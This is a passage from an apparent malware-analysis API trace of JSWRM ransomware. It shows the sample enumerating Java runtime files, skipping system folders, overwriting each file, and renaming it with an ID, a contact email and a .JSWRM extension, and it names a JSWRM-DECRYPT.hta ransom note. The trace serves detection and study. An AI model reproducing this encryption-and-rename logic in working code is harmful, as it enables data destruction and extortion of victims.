hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0070.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0070.863] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfxswt.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0070.864] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=33932) returned 1 [0070.864] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8480) returned 0x24d1d8 [0070.864] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x8480, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x8480, lpOverlapped=0x0) returned 1 [0070.867] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.867] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x8480, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x8480, lpOverlapped=0x0) returned 1 [0070.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0070.868] CloseHandle (hObject=0x454) returned 1 [0070.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0070.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0070.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0070.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0070.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216ac0 [0070.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0070.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0070.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216ac0 | out: hHeap=0x1e0000) returned 1 [0070.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.869] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfxswt.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfxswt.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0070.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0070.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0070.870] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa76f896, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xaa76f896, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xaa76f896, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8eb80, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="jsse.jar", cAlternateFileName="")) returned 1 [0070.870] lstrcmpiW (lpString1="jsse.jar", lpString2=".") returned 1 [0070.870] lstrcmpiW (lpString1="jsse.jar", lpString2="..") returned 1 [0070.870] lstrcmpiW (lpString1="jsse.jar", lpString2="...") returned 1 [0070.870] lstrcmpiW (lpString1="jsse.jar", lpString2="windows") returned -1 [0070.870] lstrcmpiW (lpString1="jsse.jar", lpString2="recovery") returned -1 [0070.870] lstrcmpiW (lpString1="jsse.jar", lpString2="perflogs") returned -1 [0070.870] lstrcmpiW (lpString1="jsse.jar", lpString2="documents and settings") returned 1 [0070.870] lstrcmpiW (lpString1="jsse.jar", lpString2="$RECYCLE.BIN") returned 1 [0070.870] lstrcmpiW (lpString1="jsse.jar", lpString2="system volume information") returned -1 [0070.870] lstrcmpiW (lpString1="jsse.jar", lpString2="msocache") returned -1 [0070.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0070.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jsse.jar", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0070.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jsse.jar", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jsse.jar", lpUsedDefaultChar=0x0) returned 8 [0070.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0070.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0070.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jsse.jar", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0070.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jsse.jar", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jsse.jar", lpUsedDefaultChar=0x0) returned 8 [0070.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0070.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0070.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0070.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0070.870] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jsse.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0070.870] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=584576) returned 1 [0070.871] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0070.871] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0070.885] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.885] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0070.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0070.885] CloseHandle (hObject=0x454) returned 1 [0070.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0070.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0070.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0070.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0070.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2175c0 [0070.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0070.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0070.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2175c0 | out: hHeap=0x1e0000) returned 1 [0070.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.886] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jsse.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jsse.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0070.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0070.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0070.887] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x203fe54e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x203fe54e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x203fe54e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0070.887] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0070.887] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0070.887] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0070.887] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0070.887] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0070.887] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0070.887] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0070.887] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0070.887] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0070.887] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0070.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0070.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0070.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0070.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0070.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0070.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0070.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0070.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0070.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0070.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0070.887] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1082, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="jvm.hprof.txt", cAlternateFileName="JVMHPR~1.TXT")) returned 1 [0070.887] lstrcmpiW (lpString1="jvm.hprof.txt", lpString2=".") returned 1 [0070.887] lstrcmpiW (lpString1="jvm.hprof.txt", lpString2="..") returned 1 [0070.887] lstrcmpiW (lpString1="jvm.hprof.txt", lpString2="...") returned 1 [0070.887] lstrcmpiW (lpString1="jvm.hprof.txt", lpString2="windows") returned -1 [0070.887] lstrcmpiW (lpString1="jvm.hprof.txt", lpString2="recovery") returned -1 [0070.887] lstrcmpiW (lpString1="jvm.hprof.txt", lpString2="perflogs") returned -1 [0070.887] lstrcmpiW (lpString1="jvm.hprof.txt", lpString2="documents and settings") returned 1 [0070.887] lstrcmpiW (lpString1="jvm.hprof.txt", lpString2="$RECYCLE.BIN") returned 1 [0070.887] lstrcmpiW (lpString1="jvm.hprof.txt", lpString2="system volume information") returned -1 [0070.888] lstrcmpiW (lpString1="jvm.hprof.txt", lpString2="msocache") returned -1 [0070.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0070.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jvm.hprof.txt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0070.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jvm.hprof.txt", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jvm.hprof.txt", lpUsedDefaultChar=0x0) returned 13 [0070.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0070.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0070.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jvm.hprof.txt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0070.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jvm.hprof.txt", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jvm.hprof.txt", lpUsedDefaultChar=0x0) returned 13 [0070.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0070.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0070.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0070.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0070.888] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jvm.hprof.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0070.888] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=4226) returned 1 [0070.888] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1080) returned 0x24d1d8 [0070.888] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x1080, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x1080, lpOverlapped=0x0) returned 1 [0070.890] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.890] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x1080, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x1080, lpOverlapped=0x0) returned 1 [0070.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0070.892] CloseHandle (hObject=0x454) returned 1 [0070.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0070.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0070.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0070.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0070.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0070.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0070.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f720 [0070.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.892] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jvm.hprof.txt"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jvm.hprof.txt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0070.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0070.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0070.893] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x997, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="logging.properties", cAlternateFileName="LOGGIN~1.PRO")) returned 1 [0070.893] lstrcmpiW (lpString1="logging.properties", lpString2=".") returned 1 [0070.893] lstrcmpiW (lpString1="logging.properties", lpString2="..") returned 1 [0070.893] lstrcmpiW (lpString1="logging.properties", lpString2="...") returned 1 [0070.893] lstrcmpiW (lpString1="logging.properties", lpString2="windows") returned -1 [0070.893] lstrcmpiW (lpString1="logging.properties", lpString2="recovery") returned -1 [0070.893] lstrcmpiW 